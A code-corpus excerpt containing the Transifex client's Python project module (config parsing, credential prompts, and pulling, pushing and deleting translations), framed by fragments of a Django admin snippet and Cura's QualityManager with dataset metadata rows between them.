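#   from etc.admin import CustomPageModelAdmin  # import path assumed
#   from .models import MyPage                  # a CustomModelPage subclass
#
#   @admin.register(MyPage)
#   class MyPageAdmin(CustomPageModelAdmin):
#       pass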
| bsd-3-clause | 7,494,133,136,866,920,000 | 31.08642 | 97 | 0.643709 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/txclib/project.py | 1 | 48650 | # -*- coding: utf-8 -*-
import getpass
import os
import re
import fnmatch
import datetime
import time
import ssl
try:
import configparser
except ImportError:
import ConfigParser as configparser
from txclib.web import *
from txclib.utils import *
from txclib.packages import urllib3
from txclib.packages.urllib3.packages import six
from txclib.urls import API_URLS
from txclib.config import OrderedRawConfigParser, Flipdict
from txclib.log import logger
from txclib.processors import visit_hostname
from txclib.paths import posix_path, native_path, posix_sep
from txclib.packages.urllib3.exceptions import SSLError
class ProjectNotInit(Exception):
pass
class Project(object):
"""
Represents an association between the local and remote project instances.
"""
def __init__(self, path_to_tx=None, init=True):
"""
Initialize the Project attributes.
"""
if init:
self._init(path_to_tx)
def _init(self, path_to_tx=None):
instructions = "Run 'tx init' to initialize your project first!"
try:
self.root = self._get_tx_dir_path(path_to_tx)
self.config_file = self._get_config_file_path(self.root)
self.config = self._read_config_file(self.config_file)
self.txrc_file = self._get_transifex_file()
local_txrc_file = self._get_transifex_file(os.getcwd())
self.txrc = self._get_transifex_config([self.txrc_file, local_txrc_file])
if os.path.exists(local_txrc_file):
self.txrc_file = local_txrc_file
except ProjectNotInit as e:
logger.error('\n'.join([six.u(str(e)), instructions]))
raise
host = self.config.get('main', 'host')
if host.lower().startswith('https://'):
self.conn = urllib3.connection_from_url(
host,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=certs_file()
)
else:
self.conn = urllib3.connection_from_url(host)
def _get_config_file_path(self, root_path):
"""Check the .tx/config file exists."""
config_file = os.path.join(root_path, ".tx", "config")
logger.debug("Config file is %s" % config_file)
if not os.path.exists(config_file):
msg = "Cannot find the config file (.tx/config)!"
raise ProjectNotInit(msg)
return config_file
def _get_tx_dir_path(self, path_to_tx):
"""Check the .tx directory exists."""
root_path = path_to_tx or find_dot_tx()
logger.debug("Path to tx is %s." % root_path)
if not root_path:
msg = "Cannot find any .tx directory!"
raise ProjectNotInit(msg)
return root_path
def _read_config_file(self, config_file):
"""Parse the config file and return its contents."""
config = OrderedRawConfigParser()
try:
config.read(config_file)
except Exception as err:
msg = "Cannot open/parse .tx/config file: %s" % err
raise ProjectNotInit(msg)
return config
def _get_transifex_config(self, txrc_files):
"""Read the configuration from the .transifexrc files."""
txrc = OrderedRawConfigParser()
try:
txrc.read(txrc_files)
except Exception as e:
msg = "Cannot read configuration file: %s" % e
raise ProjectNotInit(msg)
self._migrate_txrc_file(txrc)
return txrc
def _migrate_txrc_file(self, txrc):
"""Migrate the txrc file, if needed."""
if not os.path.exists(self.txrc_file):
return txrc
for section in txrc.sections():
orig_hostname = txrc.get(section, 'hostname')
hostname = visit_hostname(orig_hostname)
if hostname != orig_hostname:
msg = "Hostname %s should be changed to %s."
logger.info(msg % (orig_hostname, hostname))
if (sys.stdin.isatty() and sys.stdout.isatty() and
confirm('Change it now? ', default=True)):
txrc.set(section, 'hostname', hostname)
msg = 'Hostname changed'
logger.info(msg)
else:
hostname = orig_hostname
self._save_txrc_file(txrc)
return txrc
def _get_transifex_file(self, directory=None):
"""Fetch the path of the .transifexrc file.
It is in the home directory of the user by default.
"""
if directory is not None:
logger.debug(".transifexrc file is at %s" % directory)
return os.path.join(directory, ".transifexrc")
directory = os.path.expanduser('~')
txrc_file = os.path.join(directory, ".transifexrc")
logger.debug(".transifexrc file is at %s" % directory)
if not os.path.exists(txrc_file):
msg = "%s not found." % (txrc_file)
logger.info(msg)
mask = os.umask(0o077)
open(txrc_file, 'w').close()
os.umask(mask)
return txrc_file
def validate_config(self):
"""
To ensure the json structure is correctly formed.
"""
pass
def getset_host_credentials(self, host, user=None, password=None):
"""
        Read .transifexrc and return the username and password for a specific
        host; otherwise, ask the user for input.
"""
try:
username = self.txrc.get(host, 'username')
passwd = self.txrc.get(host, 'password')
except (configparser.NoOptionError, configparser.NoSectionError):
logger.info("No entry found for host %s. Creating..." % host)
username = user or input("Please enter your transifex username: ")
while (not username):
username = input("Please enter your transifex username: ")
passwd = password
while (not passwd):
passwd = getpass.getpass()
logger.info("Updating %s file..." % self.txrc_file)
self.txrc.add_section(host)
self.txrc.set(host, 'username', username)
self.txrc.set(host, 'password', passwd)
self.txrc.set(host, 'token', '')
self.txrc.set(host, 'hostname', host)
return username, passwd
def set_remote_resource(self, resource, source_lang, i18n_type, host,
file_filter="translations<sep>%(proj)s.%(res)s<sep><lang>.%(extension)s"):
"""Method to handle the add/conf of a remote resource."""
if not self.config.has_section(resource):
self.config.add_section(resource)
p_slug, r_slug = resource.split('.', 1)
file_filter = file_filter.replace("<sep>", r"%s" % posix_sep)
self.url_info = {
'host': host,
'project': p_slug,
'resource': r_slug
}
extension = self._extension_for(i18n_type)[1:]
self.config.set(resource, 'source_lang', source_lang)
self.config.set(
resource, 'file_filter',
file_filter % {'proj': p_slug, 'res': r_slug, 'extension': extension}
)
self.config.set(resource, 'type', i18n_type)
if host != self.config.get('main', 'host'):
self.config.set(resource, 'host', host)
def get_resource_host(self, resource):
"""
        Return the host that the resource is configured to use. If there is no
        such option, return the default one.
"""
return self.config.get('main', 'host')
def get_resource_lang_mapping(self, resource):
"""Get language mappings for a specific resource."""
lang_map = Flipdict()
try:
args = self.config.get("main", "lang_map")
for arg in args.replace(' ', '').split(','):
k,v = arg.split(":")
lang_map.update({k:v})
except configparser.NoOptionError:
pass
except (ValueError, KeyError):
raise Exception("Your lang map configuration is not correct.")
if self.config.has_section(resource):
res_lang_map = Flipdict()
try:
args = self.config.get(resource, "lang_map")
for arg in args.replace(' ', '').split(','):
k,v = arg.split(":")
res_lang_map.update({k:v})
except configparser.NoOptionError:
pass
except (ValueError, KeyError):
raise Exception("Your lang map configuration is not correct.")
# merge the lang maps and return result
lang_map.update(res_lang_map)
return lang_map
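    # Illustrative .tx/config snippet for the mapping parsed above (the language
    # codes are hypothetical examples):
    #
    #   [main]
    #   lang_map = pt: pt_BR, no: nb_NO
    #
    # which this method merges with any per-resource "lang_map" option into a
    # Flipdict such as {'pt': 'pt_BR', 'no': 'nb_NO'}.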
def get_source_file(self, resource):
"""
Get source file for a resource.
"""
if self.config.has_section(resource):
source_lang = self.config.get(resource, "source_lang")
source_file = self.get_resource_option(resource, 'source_file') or None
if source_file is None:
try:
file_filter = self.config.get(resource, "file_filter")
filename = file_filter.replace('<lang>', source_lang)
if os.path.exists(filename):
return native_path(filename)
except configparser.NoOptionError:
pass
else:
return native_path(source_file)
def get_resource_files(self, resource):
"""
Get a dict for all files assigned to a resource. First we calculate the
files matching the file expression and then we apply all translation
        exceptions. The resulting dict will be in this format:
{ 'en': 'path/foo/en/bar.po', 'de': 'path/foo/de/bar.po', 'es': 'path/exceptions/es.po'}
NOTE: All paths are relative to the root of the project
"""
tr_files = {}
if self.config.has_section(resource):
try:
file_filter = self.config.get(resource, "file_filter")
except configparser.NoOptionError:
file_filter = "$^"
source_lang = self.config.get(resource, "source_lang")
source_file = self.get_source_file(resource)
expr_re = regex_from_filefilter(file_filter, self.root)
expr_rec = re.compile(expr_re)
for f_path in files_in_project(self.root):
match = expr_rec.match(posix_path(f_path))
if match:
lang = match.group(1)
if lang != source_lang:
f_path = os.path.relpath(f_path, self.root)
if f_path != source_file:
tr_files.update({lang: f_path})
for (name, value) in self.config.items(resource):
if name.startswith("trans."):
value = native_path(value)
lang = name.split('.')[1]
# delete language which has same file
if value in list(tr_files.values()):
keys = []
for k, v in six.iteritems(tr_files):
if v == value:
keys.append(k)
if len(keys) == 1:
del tr_files[keys[0]]
else:
raise Exception("Your configuration seems wrong."\
" You have multiple languages pointing to"\
" the same file.")
# Add language with correct file
tr_files.update({lang:value})
return tr_files
return None
def get_resource_option(self, resource, option):
"""
Return the requested option for a specific resource
If there is no such option, we return None
"""
if self.config.has_section(resource):
if self.config.has_option(resource, option):
return self.config.get(resource, option)
return None
def get_resource_list(self, project=None):
"""
Parse config file and return tuples with the following format
[ (project_slug, resource_slug), (..., ...)]
"""
resource_list= []
for r in self.config.sections():
if r == 'main':
continue
p_slug, r_slug = r.split('.', 1)
if project and p_slug != project:
continue
resource_list.append(r)
return resource_list
def save(self):
"""
Store the config dictionary in the .tx/config file of the project.
"""
self._save_tx_config()
self._save_txrc_file()
def _save_tx_config(self, config=None):
"""Save the local config file."""
if config is None:
config = self.config
fh = open(self.config_file,"w")
config.write(fh)
fh.close()
def _save_txrc_file(self, txrc=None):
"""Save the .transifexrc file."""
if txrc is None:
txrc = self.txrc
mask = os.umask(0o077)
fh = open(self.txrc_file, 'w')
txrc.write(fh)
fh.close()
os.umask(mask)
def get_full_path(self, relpath):
if relpath[0] == os.path.sep:
return relpath
else:
return os.path.join(self.root, relpath)
def _get_pseudo_file(self, slang, resource, file_filter):
pseudo_file = file_filter.replace('<lang>', '%s_pseudo' % slang)
return native_path(pseudo_file)
def pull(self, languages=[], resources=[], overwrite=True, fetchall=False,
fetchsource=False, force=False, skip=False, minimum_perc=0, mode=None,
pseudo=False):
"""Pull all translations file from transifex server."""
self.minimum_perc = minimum_perc
resource_list = self.get_chosen_resources(resources)
if mode == 'reviewed':
url = 'pull_reviewed_file'
elif mode == 'translator':
url = 'pull_translator_file'
elif mode == 'developer':
url = 'pull_developer_file'
else:
url = 'pull_file'
for resource in resource_list:
logger.debug("Handling resource %s" % resource)
self.resource = resource
project_slug, resource_slug = resource.split('.', 1)
files = self.get_resource_files(resource)
slang = self.get_resource_option(resource, 'source_lang')
sfile = self.get_source_file(resource)
lang_map = self.get_resource_lang_mapping(resource)
host = self.get_resource_host(resource)
logger.debug("Language mapping is: %s" % lang_map)
if mode is None:
mode = self._get_option(resource, 'mode')
self.url_info = {
'host': host,
'project': project_slug,
'resource': resource_slug
}
logger.debug("URL data are: %s" % self.url_info)
stats = self._get_stats_for_resource()
try:
file_filter = self.config.get(resource, 'file_filter')
except configparser.NoOptionError:
file_filter = None
# Pull source file
pull_languages = set([])
new_translations = set([])
if pseudo:
pseudo_file = self._get_pseudo_file(
slang, resource, file_filter
)
if self._should_download(slang, stats, local_file=pseudo_file):
logger.info("Pulling pseudo file for resource %s (%s)." % (
resource,
color_text(pseudo_file, "RED")
))
self._download_pseudo(
project_slug, resource_slug, pseudo_file
)
if not languages:
continue
if fetchall:
new_translations = self._new_translations_to_add(
files, slang, lang_map, stats, force
)
if new_translations:
msg = "New translations found for the following languages: %s"
logger.info(msg % ', '.join(new_translations))
existing, new = self._languages_to_pull(
languages, files, lang_map, stats, force
)
pull_languages |= existing
new_translations |= new
logger.debug("Adding to new translations: %s" % new)
if fetchsource:
if sfile and slang not in pull_languages:
pull_languages.add(slang)
elif slang not in new_translations:
new_translations.add(slang)
if pull_languages:
logger.debug("Pulling languages for: %s" % pull_languages)
msg = "Pulling translations for resource %s (source: %s)"
logger.info(msg % (resource, sfile))
for lang in pull_languages:
local_lang = lang
if lang in list(lang_map.values()):
remote_lang = lang_map.flip[lang]
else:
remote_lang = lang
if languages and lang not in pull_languages:
logger.debug("Skipping language %s" % lang)
continue
if lang != slang:
local_file = files.get(lang, None) or files[lang_map[lang]]
else:
local_file = sfile
logger.debug("Using file %s" % local_file)
kwargs = {
'lang': remote_lang,
'stats': stats,
'local_file': local_file,
'force': force,
'mode': mode,
}
if not self._should_update_translation(**kwargs):
msg = "Skipping '%s' translation (file: %s)."
logger.info(
msg % (color_text(remote_lang, "RED"), local_file)
)
continue
if not overwrite:
local_file = ("%s.new" % local_file)
logger.warning(
" -> %s: %s" % (color_text(remote_lang, "RED"), local_file)
)
try:
r, charset = self.do_url_request(url, language=remote_lang)
except Exception as e:
if isinstance(e, SSLError) or not skip:
raise
else:
logger.error(e)
continue
base_dir = os.path.split(local_file)[0]
mkdir_p(base_dir)
fd = open(local_file, 'wb')
fd.write(r.encode(charset))
fd.close()
if new_translations:
msg = "Pulling new translations for resource %s (source: %s)"
logger.info(msg % (resource, sfile))
for lang in new_translations:
if lang in list(lang_map.keys()):
local_lang = lang_map[lang]
else:
local_lang = lang
remote_lang = lang
if file_filter:
local_file = os.path.relpath(
os.path.join(
self.root, native_path(
file_filter.replace('<lang>', local_lang)
)
), os.curdir
)
else:
trans_dir = os.path.join(self.root, ".tx", resource)
if not os.path.exists(trans_dir):
os.mkdir(trans_dir)
local_file = os.path.relpath(os.path.join(trans_dir, '%s_translation' %
local_lang, os.curdir))
if lang != slang:
satisfies_min = self._satisfies_min_translated(
stats[remote_lang], mode
)
if not satisfies_min:
msg = "Skipping language %s due to used options."
logger.info(msg % lang)
continue
logger.warning(
" -> %s: %s" % (color_text(remote_lang, "RED"), local_file)
)
r, charset = self.do_url_request(url, language=remote_lang)
base_dir = os.path.split(local_file)[0]
mkdir_p(base_dir)
fd = open(local_file, 'wb')
fd.write(r.encode(charset))
fd.close()
def push(self, source=False, translations=False, force=False, resources=[], languages=[],
skip=False, no_interactive=False):
"""
Push all the resources
"""
resource_list = self.get_chosen_resources(resources)
self.skip = skip
self.force = force
for resource in resource_list:
push_languages = []
project_slug, resource_slug = resource.split('.', 1)
files = self.get_resource_files(resource)
slang = self.get_resource_option(resource, 'source_lang')
sfile = self.get_source_file(resource)
lang_map = self.get_resource_lang_mapping(resource)
host = self.get_resource_host(resource)
logger.debug("Language mapping is: %s" % lang_map)
logger.debug("Using host %s" % host)
self.url_info = {
'host': host,
'project': project_slug,
'resource': resource_slug
}
logger.info("Pushing translations for resource %s:" % resource)
stats = self._get_stats_for_resource()
if force and not no_interactive:
answer = input("Warning: By using --force, the uploaded"
" files will overwrite remote translations, even if they"
" are newer than your uploaded files.\nAre you sure you"
" want to continue? [y/N] ")
if not answer in ["", 'Y', 'y', "yes", 'YES']:
return
if source:
if sfile is None:
logger.error("You don't seem to have a proper source file"
" mapping for resource %s. Try without the --source"
" option or set a source file first and then try again." %
resource)
continue
# Push source file
try:
logger.warning("Pushing source file (%s)" % sfile)
if not self._resource_exists(stats):
logger.info("Resource does not exist. Creating...")
fileinfo = "%s;%s" % (resource_slug, slang)
filename = self.get_full_path(sfile)
self._create_resource(resource, project_slug, fileinfo, filename)
self.do_url_request(
'push_source', multipart=True, method="PUT",
files=[(
"%s;%s" % (resource_slug, slang)
, self.get_full_path(sfile)
)],
)
except Exception as e:
if isinstance(e, SSLError) or not skip:
raise
else:
logger.error(e)
else:
try:
self.do_url_request('resource_details')
except Exception as e:
if isinstance(e, SSLError):
raise
code = getattr(e, 'code', None)
if code == 404:
msg = "Resource %s doesn't exist on the server."
logger.error(msg % resource)
continue
if translations:
# Check if given language codes exist
if not languages:
push_languages = list(files.keys())
else:
push_languages = []
f_langs = list(files.keys())
for l in languages:
if l in list(lang_map.keys()):
l = lang_map[l]
push_languages.append(l)
if l not in f_langs:
msg = "Warning: No mapping found for language code '%s'."
logger.error(msg % color_text(l,"RED"))
logger.debug("Languages to push are %s" % push_languages)
# Push translation files one by one
for lang in push_languages:
local_lang = lang
if lang in list(lang_map.values()):
remote_lang = lang_map.flip[lang]
else:
remote_lang = lang
local_file = files[local_lang]
kwargs = {
'lang': remote_lang,
'stats': stats,
'local_file': local_file,
'force': force,
}
if not self._should_push_translation(**kwargs):
msg = "Skipping '%s' translation (file: %s)."
logger.info(msg % (color_text(lang, "RED"), local_file))
continue
msg = "Pushing '%s' translations (file: %s)"
logger.warning(
msg % (color_text(remote_lang, "RED"), local_file)
)
try:
self.do_url_request(
'push_translation', multipart=True, method='PUT',
files=[(
"%s;%s" % (resource_slug, remote_lang),
self.get_full_path(local_file)
)], language=remote_lang
)
logger.debug("Translation %s pushed." % remote_lang)
except HttpNotFound:
if not source:
logger.error("Resource hasn't been created. Try pushing source file.")
except Exception as e:
if isinstance(e, SSLError) or not skip:
raise
else:
logger.error(e)
def delete(self, resources=[], languages=[], skip=False, force=False):
"""Delete translations."""
resource_list = self.get_chosen_resources(resources)
self.skip = skip
self.force = force
if not languages:
delete_func = self._delete_resource
else:
delete_func = self._delete_translations
for resource in resource_list:
project_slug, resource_slug = resource.split('.', 1)
host = self.get_resource_host(resource)
self.url_info = {
'host': host,
'project': project_slug,
'resource': resource_slug
}
logger.debug("URL data are: %s" % self.url_info)
json, _ = self.do_url_request('project_details', project=self)
project_details = parse_json(json)
teams = project_details['teams']
stats = self._get_stats_for_resource()
delete_func(project_details, resource, stats, languages)
def _delete_resource(self, project_details, resource, stats, *args):
"""Delete a resource from Transifex."""
project_slug, resource_slug = resource.split('.', 1)
project_resource_slugs = [
r['slug'] for r in project_details['resources']
]
logger.info("Deleting resource %s:" % resource)
if resource_slug not in project_resource_slugs:
if not self.skip:
msg = "Skipping: %s : Resource does not exist."
logger.info(msg % resource)
return
if not self.force:
slang = self.get_resource_option(resource, 'source_lang')
for language in stats:
if language == slang:
continue
if int(stats[language]['translated_entities']) > 0:
msg = (
"Skipping: %s : Unable to delete resource because it "
"has a not empty %s translation.\nPlease use -f or "
"--force option to delete this resource."
)
logger.info(msg % (resource, language))
return
try:
self.do_url_request('delete_resource', method="DELETE")
self.config.remove_section(resource)
self.save()
msg = "Deleted resource %s of project %s."
logger.info(msg % (resource_slug, project_slug))
except Exception as e:
msg = "Unable to delete resource %s of project %s."
logger.error(msg % (resource_slug, project_slug))
if isinstance(e, SSLError) or not self.skip:
raise
def _delete_translations(self, project_details, resource, stats, languages):
"""Delete the specified translations for the specified resource."""
logger.info("Deleting translations from resource %s:" % resource)
for language in languages:
self._delete_translation(project_details, resource, stats, language)
def _delete_translation(self, project_details, resource, stats, language):
"""Delete a specific translation from the specified resource."""
project_slug, resource_slug = resource.split('.', 1)
if language not in stats:
if not self.skip:
msg = "Skipping %s: Translation does not exist."
logger.warning(msg % (language))
return
if not self.force:
teams = project_details['teams']
if language in teams:
msg = (
"Skipping %s: Unable to delete translation because it is "
"associated with a team.\nPlease use -f or --force option "
"to delete this translation."
)
logger.warning(msg % language)
return
if int(stats[language]['translated_entities']) > 0:
msg = (
"Skipping %s: Unable to delete translation because it "
"is not empty.\nPlease use -f or --force option to delete "
"this translation."
)
logger.warning(msg % language)
return
try:
self.do_url_request(
'delete_translation', language=language, method="DELETE"
)
msg = "Deleted language %s from resource %s of project %s."
logger.info(msg % (language, resource_slug, project_slug))
except Exception as e:
msg = "Unable to delete translation %s"
logger.error(msg % language)
if isinstance(e, SSLError) or not self.skip:
raise
def do_url_request(self, api_call, multipart=False, data=None,
files=[], method="GET", **kwargs):
"""
Issues a url request.
"""
# Read the credentials from the config file (.transifexrc)
host = self.url_info['host']
try:
username = self.txrc.get(host, 'username')
passwd = self.txrc.get(host, 'password')
token = self.txrc.get(host, 'token')
hostname = self.txrc.get(host, 'hostname')
except configparser.NoSectionError:
raise Exception("No user credentials found for host %s. Edit"
" ~/.transifexrc and add the appropriate info in there." %
host)
# Create the Url
kwargs['hostname'] = hostname
kwargs.update(self.url_info)
url = API_URLS[api_call] % kwargs
if multipart:
for info, filename in files:
                # FIXME: This works only because a single item is ever passed
                # in the 'files' argument.
name = os.path.basename(filename)
data = {
"resource": info.split(';')[0],
"language": info.split(';')[1],
"uploaded_file": (name, open(filename, 'rb').read())
}
return make_request(method, hostname, url, username, passwd, data)
def _should_update_translation(self, lang, stats, local_file, force=False,
mode=None):
"""Whether a translation should be udpated from Transifex.
We use the following criteria for that:
- If user requested to force the download.
- If language exists in Transifex.
- If the local file is older than the Transifex's file.
- If the user requested a x% completion.
Args:
lang: The language code to check.
stats: The (global) statistics object.
local_file: The local translation file.
force: A boolean flag.
mode: The mode for the translation.
Returns:
True or False.
"""
return self._should_download(lang, stats, local_file, force)
def _should_add_translation(self, lang, stats, force=False, mode=None):
"""Whether a translation should be added from Transifex.
We use the following criteria for that:
- If user requested to force the download.
- If language exists in Transifex.
- If the user requested a x% completion.
Args:
lang: The language code to check.
stats: The (global) statistics object.
force: A boolean flag.
mode: The mode for the translation.
Returns:
True or False.
"""
return self._should_download(lang, stats, None, force)
def _should_download(self, lang, stats, local_file=None, force=False,
mode=None):
"""Return whether a translation should be downloaded.
If local_file is None, skip the timestamps check (the file does
not exist locally).
"""
try:
lang_stats = stats[lang]
except KeyError as e:
logger.debug("No lang %s in statistics" % lang)
return False
satisfies_min = self._satisfies_min_translated(lang_stats, mode)
if not satisfies_min:
return False
if force:
logger.debug("Downloading translation due to -f")
return True
if local_file is not None:
remote_update = self._extract_updated(lang_stats)
if not self._remote_is_newer(remote_update, local_file):
logger.debug("Local is newer than remote for lang %s" % lang)
return False
return True
def _should_push_translation(self, lang, stats, local_file, force=False):
"""Return whether a local translation file should be
        pushed to Transifex.
We use the following criteria for that:
- If user requested to force the upload.
- If language exists in Transifex.
- If local file is younger than the remote file.
Args:
lang: The language code to check.
stats: The (global) statistics object.
local_file: The local translation file.
force: A boolean flag.
Returns:
True or False.
"""
if force:
logger.debug("Push translation due to -f.")
return True
try:
lang_stats = stats[lang]
except KeyError as e:
logger.debug("Language %s does not exist in Transifex." % lang)
return True
if local_file is not None:
remote_update = self._extract_updated(lang_stats)
if self._remote_is_newer(remote_update, local_file):
msg = "Remote translation is newer than local file for lang %s"
logger.debug(msg % lang)
return False
return True
def _generate_timestamp(self, update_datetime):
"""Generate a UNIX timestamp from the argument.
Args:
update_datetime: The datetime in the format used by Transifex.
Returns:
A float, representing the timestamp that corresponds to the
argument.
"""
time_format = "%Y-%m-%d %H:%M:%S"
return time.mktime(
datetime.datetime(
*time.strptime(update_datetime, time_format)[0:5]
).utctimetuple()
)
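    # Illustrative example (the value is hypothetical): for "2015-03-02 11:45:01"
    # the [0:5] slice above keeps only year..minute, so the seconds component is
    # ignored when the timestamp is built.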
def _get_time_of_local_file(self, path):
"""Get the modified time of the path_.
Args:
path: The path we want the mtime for.
Returns:
The time as a timestamp or None, if the file does not exist
"""
if not os.path.exists(path):
return None
return time.mktime(time.gmtime(os.path.getmtime(path)))
def _satisfies_min_translated(self, stats, mode=None):
"""Check whether a translation fulfills the filter used for
minimum translated percentage.
Args:
            stats: The stats object for the language, as returned by Transifex.
            mode: The mode of translations requested.
Returns:
True or False
"""
cur = self._extract_completed(stats, mode)
option_name = 'minimum_perc'
if self.minimum_perc is not None:
minimum_percent = self.minimum_perc
else:
global_minimum = int(
self.get_resource_option('main', option_name) or 0
)
resource_minimum = int(
self.get_resource_option(
self.resource, option_name
) or global_minimum
)
minimum_percent = resource_minimum
return cur >= minimum_percent
def _remote_is_newer(self, remote_updated, local_file):
"""Check whether the remote translation is newer that the local file.
Args:
remote_updated: The date and time the translation was last
updated remotely.
local_file: The local file.
Returns:
True or False.
"""
if remote_updated is None:
logger.debug("No remote time")
return False
remote_time = self._generate_timestamp(remote_updated)
local_time = self._get_time_of_local_file(
self.get_full_path(local_file)
)
logger.debug(
"Remote time is %s and local %s" % (remote_time, local_time)
)
if local_time is not None and remote_time < local_time:
return False
return True
@classmethod
def _extract_completed(cls, stats, mode=None):
"""Extract the information for the translated percentage from the stats.
Args:
stats: The stats object for a language as returned by Transifex.
mode: The mode of translations requested.
Returns:
The percentage of translation as integer.
"""
if mode == 'reviewed':
key = 'reviewed_percentage'
else:
key = 'completed'
try:
return int(stats[key][:-1])
except KeyError as e:
return 0
@classmethod
def _extract_updated(cls, stats):
"""Extract the information for the last update of a translation.
Args:
stats: The stats object for a language as returned by Transifex.
Returns:
The last update field.
"""
try:
return stats['last_update']
except KeyError as e:
return None
def _download_pseudo(self, project_slug, resource_slug, pseudo_file):
response, charset = self.do_url_request(
'pull_pseudo_file',
resource_slug=resource_slug,
project_slug=project_slug
)
response = parse_json(response)
base_dir = os.path.split(pseudo_file)[0]
mkdir_p(base_dir)
with open(pseudo_file, "wb") as fd:
fd.write(response['content'].encode("utf-8"))
def _new_translations_to_add(self, files, slang, lang_map,
stats, force=False):
"""Return a list of translations which are new to the
local installation.
"""
new_translations = []
timestamp = time.time()
langs = list(stats.keys())
logger.debug("Available languages are: %s" % langs)
for lang in langs:
lang_exists = lang in list(files.keys())
lang_is_source = lang == slang
mapped_lang_exists = (
lang in lang_map and lang_map[lang] in list(files.keys())
)
if lang_exists or lang_is_source or mapped_lang_exists:
continue
if self._should_add_translation(lang, stats, force):
new_translations.append(lang)
return set(new_translations)
def _get_stats_for_resource(self):
"""Get the statistics information for a resource."""
try:
r, charset = self.do_url_request('resource_stats')
logger.debug("Statistics response is %s" % r)
stats = parse_json(r)
except HttpNotFound:
logger.debug("Resource not found, creating...")
stats = {}
except Exception as e:
logger.debug(six.u(str(e)))
raise
return stats
def get_chosen_resources(self, resources):
"""Get the resources the user selected.
Support wildcards in the resources specified by the user.
Args:
resources: A list of resources as specified in command-line or
an empty list.
Returns:
A list of resources.
"""
configured_resources = self.get_resource_list()
if not resources:
return configured_resources
selected_resources = []
for resource in resources:
found = False
for full_name in configured_resources:
if fnmatch.fnmatch(full_name, resource):
selected_resources.append(full_name)
found = True
if not found:
msg = "Specified resource '%s' does not exist."
raise Exception(msg % resource)
logger.debug("Operating on resources: %s" % selected_resources)
return selected_resources
def _languages_to_pull(self, languages, files, lang_map, stats, force):
"""Get a set of langauges to pull.
Args:
languages: A list of languages the user selected in cmd.
files: A dictionary of current local translation files.
Returns:
A tuple of a set of existing languages and new translations.
"""
if not languages:
pull_languages = set([])
pull_languages |= set(files.keys())
mapped_files = []
for lang in pull_languages:
if lang in lang_map.flip:
mapped_files.append(lang_map.flip[lang])
pull_languages -= set(lang_map.flip.keys())
pull_languages |= set(mapped_files)
return (pull_languages, set([]))
else:
pull_languages = []
new_translations = []
f_langs = list(files.keys())
for l in languages:
if l not in f_langs and not (l in lang_map and lang_map[l] in f_langs):
if self._should_add_translation(l, stats, force):
new_translations.append(l)
else:
if l in list(lang_map.keys()):
l = lang_map[l]
pull_languages.append(l)
return (set(pull_languages), set(new_translations))
def _extension_for(self, i18n_type):
"""Return the extension used for the specified type."""
try:
json, charset = self.do_url_request('formats')
res = parse_json(json)
return res[i18n_type]['file-extensions'].split(',')[0]
except Exception as e:
logger.error(e)
return ''
def _resource_exists(self, stats):
"""Check if resource exists.
Args:
stats: The statistics dict as returned by Tx.
Returns:
True, if the resource exists in the server.
"""
return bool(stats)
def _create_resource(self, resource, pslug, fileinfo, filename, **kwargs):
"""Create a resource.
Args:
resource: The full resource name.
pslug: The slug of the project.
fileinfo: The information of the resource.
filename: The name of the file.
Raises:
URLError, in case of a problem.
"""
multipart = True
method = "POST"
api_call = 'create_resource'
host = self.url_info['host']
try:
username = self.txrc.get(host, 'username')
passwd = self.txrc.get(host, 'password')
token = self.txrc.get(host, 'token')
hostname = self.txrc.get(host, 'hostname')
except configparser.NoSectionError:
raise Exception("No user credentials found for host %s. Edit"
" ~/.transifexrc and add the appropriate info in there." %
host)
# Create the Url
kwargs['hostname'] = hostname
kwargs.update(self.url_info)
kwargs['project'] = pslug
url = (API_URLS[api_call] % kwargs).encode('UTF-8')
i18n_type = self._get_option(resource, 'type')
if i18n_type is None:
raise Exception(
"Please define the resource type in .tx/config (eg. type = PO)."
" More info: http://bit.ly/txcl-rt"
)
data = {
"slug": fileinfo.split(';')[0],
"name": fileinfo.split(';')[0],
"uploaded_file": (filename, open(filename, 'rb').read()),
"i18n_type": i18n_type
}
r, charset = make_request(method, hostname, url, username, passwd, data)
return r
def _get_option(self, resource, option):
"""Get the value for the option in the config file.
If the option is not in the resource section, look for it in
the project.
Args:
resource: The resource name.
option: The option the value of which we are interested in.
Returns:
The option value or None, if it does not exist.
"""
value = self.get_resource_option(resource, option)
if value is None:
if self.config.has_option('main', option):
return self.config.get('main', option)
return value
def set_i18n_type(self, resources, i18n_type):
"""Set the type for the specified resources."""
self._set_resource_option(resources, key='type', value=i18n_type)
def set_min_perc(self, resources, perc):
"""Set the minimum percentage for the resources."""
self._set_resource_option(resources, key='minimum_perc', value=perc)
def set_default_mode(self, resources, mode):
"""Set the default mode for the specified resources."""
self._set_resource_option(resources, key='mode', value=mode)
def _set_resource_option(self, resources, key, value):
"""Set options in the config file.
        If resources is empty, set the option globally.
"""
if not resources:
self.config.set('main', key, value)
return
for r in resources:
self.config.set(r, key, value)
| agpl-3.0 | -8,030,408,997,415,867,000 | 37.611111 | 98 | 0.519301 | false |
hmflash/Cura | cura/QualityManager.py | 1 | 16324 | # Copyright (c) 2016 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
# This collects a lot of quality and quality changes related code which was split between ContainerManager
# and the MachineManager and really needs to be usable from both.
from typing import List
from UM.Application import Application
from UM.Settings.ContainerRegistry import ContainerRegistry
from UM.Settings.DefinitionContainer import DefinitionContainer
from UM.Settings.InstanceContainer import InstanceContainer
from cura.Settings.ExtruderManager import ExtruderManager
class QualityManager:
## Get the singleton instance for this class.
@classmethod
def getInstance(cls) -> "QualityManager":
# Note: Explicit use of class name to prevent issues with inheritance.
if not QualityManager.__instance:
QualityManager.__instance = cls()
return QualityManager.__instance
__instance = None # type: "QualityManager"
## Find a quality by name for a specific machine definition and materials.
#
# \param quality_name
# \param machine_definition (Optional) \type{ContainerInstance} If nothing is
# specified then the currently selected machine definition is used.
# \param material_containers (Optional) \type{List[ContainerInstance]} If nothing is specified then
# the current set of selected materials is used.
# \return the matching quality container \type{ContainerInstance}
def findQualityByName(self, quality_name, machine_definition=None, material_containers=None):
criteria = {"type": "quality", "name": quality_name}
result = self._getFilteredContainersForStack(machine_definition, material_containers, **criteria)
# Fall back to using generic materials and qualities if nothing could be found.
if not result and material_containers and len(material_containers) == 1:
basic_materials = self._getBasicMaterials(material_containers[0])
result = self._getFilteredContainersForStack(machine_definition, basic_materials, **criteria)
